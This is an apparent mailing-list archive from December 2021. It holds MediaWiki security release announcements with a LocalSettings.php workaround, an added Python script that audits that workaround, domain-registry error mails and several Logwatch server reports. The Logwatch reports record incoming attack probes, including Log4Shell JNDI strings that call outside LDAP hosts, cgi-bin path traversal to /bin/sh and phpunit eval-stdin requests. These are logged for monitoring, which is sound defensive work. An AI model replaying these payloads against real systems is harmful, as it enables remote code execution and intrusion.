[MediaWiki-announce] Security and maintenance release: 1.35.5 / 1.36.3 / 1.37.1
by Sam Reed
I would like to announce the release of MediaWiki 1.35.5, 1.36.3 and 1.37.1!
This release fixes multiple high severity authorization bypasses in
MediaWiki core that both allow for reading private wikis and editing
arbitrary pages on any wiki.
If you do not have time to upgrade right away, please set the following at
the bottom of your LocalSettings.php to disable the vulnerable code
immediately:
$wgActions['mcrundo'] = false;
$wgActions['mcrrestore'] = false;
$wgWhitelistRead = [];
$wgWhitelistReadRegexp = [];
This will also work for vulnerable end-of-life MediaWiki versions that do
not have a patch available.
A more detailed FAQ about these issues is available at
https://www.mediawiki.org/wiki/2021-12_security_release/FAQ
These releases also serve as a maintenance release for these branches.
Note that the patches are much larger than recent previous security and
maintenance releases. This is due to the re-introduction of translation
backports. These include the export of new languages that have met the
translation threshold in the development branch of MediaWiki. These
translation updates are for both MediaWiki core and the bundled skins and
extensions. In the case of MediaWiki 1.35, this is translation updates
going back 18 months, hence the size of the patch.
While tarballs have already been uploaded as of this e-mail, git tags will
follow later on today.
A "MediaWiki Extensions Security Release Supplement" e-mail will follow
this one, covering security updates for non-bundled extensions.
Finally, a big thanks to all those involved in reporting, investigating and
fixing these issues.
== Security fixes ==
* (T292763, CVE-2021-44854) REST API incorrectly publicly caches
autocomplete search results from private wikis.
* (T271037, CVE-2021-44856) Title blocked in AbuseFilter can be created via
Special:ChangeContentModel.
* (T297322, CVE-2021-44857) Unauthorized users can use action=mcrundo to
replace the content of arbitrary pages.
* (T297322, CVE-2021-44858) Unauthorized users can view contents of private
wikis using various actions.
* (T297574, CVE-2021-45038) Unauthorized users can access private wiki
contents using rollback action.
=== Extension security fixes ===
* (T293589, CVE-2021-44855) Blind Stored XSS in VisualEditor media dialog.
* (T294686) Special:Nuke doesn't actually delete pages.
== Links to all mentioned tasks ==
* https://phabricator.wikimedia.org/T294686
* https://phabricator.wikimedia.org/T297322
* https://phabricator.wikimedia.org/T293589
* https://phabricator.wikimedia.org/T292763
* https://phabricator.wikimedia.org/T271037
== Release notes ==
Full release notes for 1.35.5:
https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_35/RELEASE-NOT...
https://www.mediawiki.org/wiki/Release_notes/1.35
Full release notes for 1.36.3:
https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_36/RELEASE-NOT...
https://www.mediawiki.org/wiki/Release_notes/1.36
Full release notes for 1.37.1:
https://phabricator.wikimedia.org/diffusion/MW/browse/REL1_37/RELEASE-NOT...
https://www.mediawiki.org/wiki/Release_notes/1.37
For information about how to upgrade, see
<https://www.mediawiki.org/wiki/Manual:Upgrading>
**********************************************************************
Download:
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.tar.gz
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.zip
Download without bundled extensions:
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-core-1.36.3.tar.gz
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-core-1.36.3.zip
Patch to previous version (1.36.2):
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.patch.gz
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.patch.zip
GPG signatures:
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-core-1.36.3.tar.g...
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-core-1.36.3.zip.sig
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.tar.gz.sig
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.zip.sig
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.patch.gz.sig
https://releases.wikimedia.org/mediawiki/1.36/mediawiki-1.36.3.patch.zip.sig
Public keys:
https://www.mediawiki.org/keys/keys.html
**********************************************************************
Download:
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.tar.gz
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.zip
Download without bundled extensions:
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-core-1.37.1.tar.gz
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-core-1.37.1.zip
Patch to previous version (1.37.0):
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.patch.gz
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.patch.zip
GPG signatures:
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-core-1.37.1.tar.g...
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-core-1.37.1.zip.sig
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.tar.gz.sig
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.zip.sig
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.patch.gz.sig
https://releases.wikimedia.org/mediawiki/1.37/mediawiki-1.37.1.patch.zip.sig
Public keys:
https://www.mediawiki.org/keys/keys.html
**********************************************************************
Download:
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.tar.gz
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.zip
Download without bundled extensions:
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.5.tar.gz
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.5.zip
Patch to previous version (1.35.4):
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.patch.gz
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.patch.zip
GPG signatures:
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.5.tar.g...
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-core-1.35.5.zip.sig
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.tar.gz.sig
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.zip.sig
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.patch.gz.sig
https://releases.wikimedia.org/mediawiki/1.35/mediawiki-1.35.5.patch.zip.sig
Public keys:
https://www.mediawiki.org/keys/keys.html
_______________________________________________
MediaWiki-announce mailing list -- mediawiki-announce(a)lists.wikimedia.org
To unsubscribe send an email to mediawiki-announce-leave(a)lists.wikimedia.org
3 years, 10 months
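The announcement above gives two remediation paths: upgrade to 1.35.5 / 1.36.3 / 1.37.1, or put four settings at the bottom of LocalSettings.php. The following is an added example (not part of the original e-mail and not MediaWiki code) that checks both for one installation. The function names and the sample LocalSettings.php are constructed for illustration, and the scan is a text heuristic that assumes simple top-level assignments, not a PHP parser.

```python
import re

# Fixed point releases named in the announcement, keyed by release branch.
FIXED_RELEASES = {(1, 35): 5, (1, 36): 3, (1, 37): 1}


def release_status(version):
    """Classify an installed MediaWiki version against the announced releases."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unrecognised version string: %r" % version)
    major, minor, patch = (int(g) for g in m.groups())
    fixed = FIXED_RELEASES.get((major, minor))
    if fixed is None:
        # The announcement lists no patch for this branch (for example an
        # end-of-life one); the LocalSettings.php workaround is the option.
        return "branch-not-listed"
    return "patched" if patch >= fixed else "needs-upgrade"


def _assignment(target):
    # Matches "<target> = <value>;" but not "==" comparisons.
    return re.compile(target + r"\s*=(?!=)\s*(?P<val>[^;]*);")


EMPTY_ARRAY = {"[]", "array()"}  # array() is PHP's long form of []

# Setting from the announcement -> (pattern for writes to it, disabling values).
CHECKS = {
    "$wgActions['mcrundo']": (
        _assignment(r"\$wgActions\s*\[\s*['\"]mcrundo['\"]\s*\]"), {"false"}),
    "$wgActions['mcrrestore']": (
        _assignment(r"\$wgActions\s*\[\s*['\"]mcrrestore['\"]\s*\]"), {"false"}),
    # The optional subscript also catches "$wgWhitelistRead[] = ...;" appends.
    "$wgWhitelistRead": (
        _assignment(r"\$wgWhitelistRead\b\s*(?P<sub>\[[^\]]*\])?"), EMPTY_ARRAY),
    "$wgWhitelistReadRegexp": (
        _assignment(r"\$wgWhitelistReadRegexp\b\s*(?P<sub>\[[^\]]*\])?"), EMPTY_ARRAY),
}


def strip_comments(php):
    """Drop /* */ blocks and //- or #-comments that follow whitespace."""
    php = re.sub(r"/\*.*?\*/", "", php, flags=re.S)
    return re.sub(r"(^|\s)(//|#).*$", r"\1", php, flags=re.M)


def audit_workaround(php_source):
    """Return {setting: 'ok' | 'missing' | 'not-disabled'}.

    The announcement says to place the lines at the bottom of the file because
    the last write wins, so only the final write to each setting is judged.
    """
    code = strip_comments(php_source)
    report = {}
    for name, (pattern, accepted) in CHECKS.items():
        writes = list(pattern.finditer(code))
        if not writes:
            report[name] = "missing"
            continue
        last = writes[-1]
        value = re.sub(r"\s+", "", last.group("val")).lower()
        is_element_write = last.groupdict().get("sub") is not None
        ok = value in accepted and not is_element_write
        report[name] = "ok" if ok else "not-disabled"
    return report


# Constructed sample: the workaround is present, but one line is commented
# out and a later append re-populates the read whitelist.
SAMPLE_LOCALSETTINGS = """<?php
$wgSitename = "Example";
$wgGroupPermissions['*']['read'] = false;
$wgWhitelistRead = [ 'Main Page', 'Special:UserLogin' ];
# Workaround from the announcement
$wgActions['mcrundo'] = false;
$wgActions["mcrrestore"] = false;
$wgWhitelistRead = [];
// $wgWhitelistReadRegexp = [];
require_once "$IP/extensions/local.php";
$wgWhitelistRead[] = 'Help:Contents';
"""

if __name__ == "__main__":
    print("1.36.2 ->", release_status("1.36.2"))
    for setting, state in audit_workaround(SAMPLE_LOCALSETTINGS).items():
        print("%-28s %s" % (setting, state))
```

Settings changed inside included files or extension code are not seen by this scan, which only reads the text it is given.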
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Wed Dec 15 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-14 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 25:25 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 7 sites probed the server
Requests with error response codes
400 Bad Request
null: 15 Time(s)
mstshash=Domain: 6 Time(s)
/: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 3 Time(s)
/config/getuser?index=0: 3 Time(s)
/bag2: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
Z,j\xC8\x18\x1A: 1 Time(s)
zapf.in: 1 Time(s)
500 Internal Server Error
/: 31 Time(s)
/robots.txt: 4 Time(s)
/.env: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/favicon.ico: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/.git/config: 1 Time(s)
/.well-known/security.txt: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/HNAP1: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/console/: 1 Time(s)
/evox/about: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/nmaplowercheck1639504127: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/sdk: 1 Time(s)
/sitemap.xml: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 150 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
4 Miscellaneous warnings
8.362K Bytes accepted 8,563
8.362K Bytes sent via SMTP 8,563
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
4 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
4 Total 4xx Rejects 100.00%
======== ==================================================
47 Connections
39 Connections lost (inbound)
47 Disconnections
1 Removed from queue
1 Sent via SMTP
21 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
Illegal users from:
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
DOMAIN studienreform-forum.de UPDATE FAILED
by InterNetworX DomRobot
DOMAIN: studienreform-forum.de
REGISTRY-MESSAGE:
> RESULT: failed
> STID: 9e79a740-5d37-11ec-b747-9f4fcacaa9cc
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns4.inwx.com./2a02:d500:0:0:0:0:0:53\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.inwx.de./2001:67c:1bc:0:0:0:0:104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns2.inwx.de./176.97.158.104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.inwx.de./192.174.68.104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns3.inwx.eu./45.87.158.53\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns2.inwx.de./2001:67c:10b8:0:0:0:0:104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> WARNING: 33300102912 Predelegation Check warning [WARNING: 113 Primary Master (MNAME) inconsistent across SOA records (master) (\[ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.zapf.in.\])]
-----------------------------------------------------------------------------------
DOMAIN UPDATE FAILED
-----------------------------------------------------------------------------------
3 years, 10 months
DOMAIN studienreform-forum.de UPDATE FAILED
by InterNetworX DomRobot
DOMAIN: studienreform-forum.de
REGISTRY-MESSAGE:
> RESULT: failed
> STID: f5916819-5d1b-11ec-b747-9f4fcacaa9cc
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns3.inwx.eu./2a02:d500:0:0:0:0:0:53\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.inwx.de./2001:67c:1bc:0:0:0:0:104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns2.inwx.de./176.97.158.104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.zapf.in./94.130.65.175\, \[ns2.inwx.de\, ns.zapf.in\, ns.inwx.de\, ns3.inwx.eu\, ns4.inwx.com\, ns5.inwx.net\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns.inwx.de./192.174.68.104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns3.inwx.eu./45.87.158.53\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> ERROR: 53300102912 Nameserver error [ERROR: 118 Inconsistent set of NS RRs (IP\, NS host names) (ns2.inwx.de./2001:67c:10b8:0:0:0:0:104\, \[ns2.inwx.de\, ns.inwx.de\, ns3.inwx.eu\])]
> WARNING: 33300102912 Predelegation Check warning [WARNING: 113 Primary Master (MNAME) inconsistent across SOA records (master) (\[ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.inwx.de.\, ns.zapf.in.\])]
-----------------------------------------------------------------------------------
DOMAIN UPDATE FAILED
-----------------------------------------------------------------------------------
3 years, 10 months
DOMAIN studienreform-forum.de TRANSFER SUCCESSFUL
by InterNetworX DomRobot
DOMAIN: studienreform-forum.de
REGISTRY-MESSAGE:
> RESULT: success
> STID: 89f186a3-5d1b-11ec-b747-9f4fcacaa9cc
-----------------------------------------------------------------------------------
TRANSFER SUCCESSFUL - WE RECEIVED AN ACK FOR YOUR REQUEST
-----------------------------------------------------------------------------------
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Tue Dec 14 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-13 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 23:23 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
112.94.253.176 -> zapf.wiki:443: 1 Time(s)
223.167.74.215 -> zapf.wiki:443: 1 Time(s)
45.81.235.112 -> 45.81.235.214:4444: 9 Time(s)
60.191.125.35 -> zapf.wiki:443: 1 Time(s)
A total of 3 sites probed the server
159.65.36.205
61.219.11.151
66.240.205.34
Requests with error response codes
400 Bad Request
45.81.235.214:4444: 9 Time(s)
null: 4 Time(s)
zapf.wiki:443: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/config/getuser?index=0: 2 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
mstshash=Administr: 2 Time(s)
mstshash=Domain: 2 Time(s)
/: 1 Time(s)
/.git/config: 1 Time(s)
/aaa9: 1 Time(s)
/aab9: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash: 1 Time(s)
404 Not Found
/berlin/apple-touch-icon.png: 1 Time(s)
500 Internal Server Error
/: 22 Time(s)
/robots.txt: 4 Time(s)
/$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D: 2 Time(s)
/.env: 2 Time(s)
//QeeB: 2 Time(s)
/$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D: 1 Time(s)
/.git/config: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/_profiler/phpinfo: 1 Time(s)
/aaa9: 1 Time(s)
/aab9: 1 Time(s)
/actuator/health: 1 Time(s)
/bag2: 1 Time(s)
/console/: 1 Time(s)
/debug/default/view?panel=config: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 145 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
6 Miscellaneous warnings
8.927K Bytes accepted 9,141
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
17 Connections
9 Connections lost (inbound)
17 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
Illegal users from:
**Unmatched Entries**
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (0,ssh-connection) [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
[MediaWiki-announce] Security pre-release announcement: 1.35.5 / 1.36.3 / 1.37.1
by Sam Reed
Hi all,
On Wednesday we will be issuing a security and maintenance release to all
supported branches of MediaWiki.
The new releases will be:
- 1.35.5
- 1.36.3
- 1.37.1
This release includes fixes for multiple high severity authorization
bypasses in MediaWiki core; it is recommended you patch immediately. A
short LocalSettings.php configuration snippet will also be shared to
disable the vulnerable functionality if you are unable to patch right away.
This snippet should work across all vulnerable MediaWiki versions,
including end-of-life ones.
In addition to that, this will resolve other issues in MediaWiki core and
also includes some fixes previously committed to git, including minor
security and hardening patches along with bug fixes included for
maintenance reasons.
It also fixes 2 issues in MediaWiki tarball bundled extensions.
We will make the fixes available in these respective release branches and
master. Tarballs will be available for the above mentioned point releases
as well.
A summary of some of the security fixes that have gone into non-bundled
MediaWiki extensions will also follow later.
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Dec 13 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-12 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 22:22 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
123.171.247.39 -> zapf.wiki:443: 1 Time(s)
45.148.10.241 -> zapf.wiki:443: 1 Time(s)
45.81.235.112 -> 45.81.235.214:4444: 2 Time(s)
45.93.250.148 -> 45.81.235.214:4444: 1 Time(s)
A total of 7 sites probed the server
Requests with error response codes
400 Bad Request
null: 8 Time(s)
mstshash=Administr: 6 Time(s)
/: 3 Time(s)
45.81.235.214:4444: 3 Time(s)
http://fuwu.sogou.com/404/index.html: 2 Time(s)
mstshash=Domain: 2 Time(s)
zapf.wiki:443: 2 Time(s)
&\xB7xM\xC1\xE2\xF2u5\xD3\x96\x1E\xD8i=1\x ... x09\xC0\x13\xC0: 1 Time(s)
/aaa9: 1 Time(s)
/aab9: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/config/getuser?index=0: 1 Time(s)
/socket.io/?noteId=FrcS3CFURGOhH8IZnOVeEw& ... LordAJVcFe3AAAf: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
10\x05J~uTz\x84\x12_O\xC4FJ\xBD\xD9\xC9w\x ... x09\xC0\x13\xC0: 1 Time(s)
\x8A\x94\x81\xF9\xA0\xE5: 1 Time(s)
\xBF\x02\x00\x88\x13\x00\x00\x87\x00\x00\x ... 0\x00/\x9E\x16E: 1 Time(s)
icap://icap-server.net/server?arg=87: 1 Time(s)
z\xA8F\x199\xD0t\xE38\x8BP\xDB\x9CC1_LU\xC ... x09\xC0\x14\xC0: 1 Time(s)
404 Not Found
/: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
499 (undefined)
/: 4 Time(s)
500 Internal Server Error
/: 16 Time(s)
/.env: 4 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/?x=${jndi:ldap://45.155.205.233:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/aaa9: 1 Time(s)
/aab9: 1 Time(s)
/actuator/health: 1 Time(s)
/console/: 1 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
/favicon.ico: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 111 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
15.502K Bytes accepted 15,874
15.502K Bytes sent via SMTP 15,874
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
16 Connections
6 Connections lost (inbound)
16 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
Illegal users from:
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
3 years, 10 months
Logwatch for h2361197.stratoserver.net (Linux)
by root@zapf.in
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sun Dec 12 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-11 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 33:33 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 1 sites probed the server
23.250.19.242
Requests with error response codes
400 Bad Request
null: 7 Time(s)
mstshash=Administr: 5 Time(s)
/: 4 Time(s)
mstshash=Domain: 4 Time(s)
//cgi-bin/login.cgi: 1 Time(s)
//doc/page/login.asp: 1 Time(s)
//favicon.ico: 1 Time(s)
/cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/bin/bash: 1 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 1 Time(s)
7: 1 Time(s)
499 (undefined)
/apple-touch-icon.png: 4 Time(s)
/build/cover-styles-pack.fef3ca2736298be630a4.css: 3 Time(s)
/build/constant.js: 2 Time(s)
/js/mathjax-config-extra.js: 2 Time(s)
/build/MathJax/MathJax.js: 1 Time(s)
/build/emojify.js/dist/css/basic/emojify.min.css: 1 Time(s)
/build/font-pack.fef3ca2736298be630a4.css: 1 Time(s)
/build/index-styles.fef3ca2736298be630a4.css: 1 Time(s)
/favicon.ico: 1 Time(s)
/fonts/SourceSansPro-Regular.woff: 1 Time(s)
/fonts/SourceSansPro-Semibold.woff: 1 Time(s)
500 Internal Server Error
/: 25 Time(s)
/.env: 8 Time(s)
/robots.txt: 4 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/$%7Bjndi:ldap://http443path.kryptoslogic- ... /http443path%7D: 1 Time(s)
/.well-known/security.txt: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/api/blog/5e09fe7d-84f5-4630-90c6-c0a838627227: 1 Time(s)
/config.json: 1 Time(s)
/debug/default/view?panel=config: 1 Time(s)
/favicon.ico: 1 Time(s)
/info.php: 1 Time(s)
/owa/auth.owa: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/sitemap.xml: 1 Time(s)
502 Bad Gateway
/1M3B801aTLa4jlAz2WbSrw/pdf: 1 Time(s)
/D1lk7Eb3Squ7uGiIXiErNg/pdf: 1 Time(s)
/siegen17/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 158 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
2 Miscellaneous warnings
10.139K Bytes accepted 10,382
10.139K Bytes sent via SMTP 10,382
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
2 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
2 Total 4xx Rejects 100.00%
======== ==================================================
28 Connections
12 Connections lost (inbound)
